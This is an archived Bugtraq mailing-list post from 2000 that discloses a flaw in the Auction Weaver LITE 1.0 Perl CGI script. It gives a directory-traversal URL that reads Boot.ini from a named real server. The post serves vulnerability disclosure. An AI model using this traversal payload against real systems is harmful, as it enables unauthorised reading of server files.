[16390] in bugtraq
=?iso-8859-9?Q?Auction_WeaverT_LITE_1.0?=
daemon@ATHENA.MIT.EDU (Meliksah Ozoral)
Fri Aug 25 15:04:44 2000
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-9"
Content-Transfer-Encoding: 7bit
Message-ID: <LPBBJCJBMJADMOOPCAKNEEOOCGAA.meliksah@meliksah.net>
Date: Wed, 23 Aug 2000 23:29:51 +0300
Reply-To: Meliksah Ozoral <meliksah@MELIKSAH.NET>
From: Meliksah Ozoral <meliksah@MELIKSAH.NET>
X-To: submissions@packetstorm.securify.com
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
I don't know if this has been reported before. Auction Weaver allow you to
read files from server. Remote users can view source of files on server.
http://www.cgiscriptcenter.com/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=c
at17&fromfile=967251278%2Edat
http://www.cgiscriptcenter.com/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\
..\..\..\..\..\..\..\..\&fromfile=Boot.ini
Meliksah Ozoral
meliksah@meliksah.net
www.meliksah.net
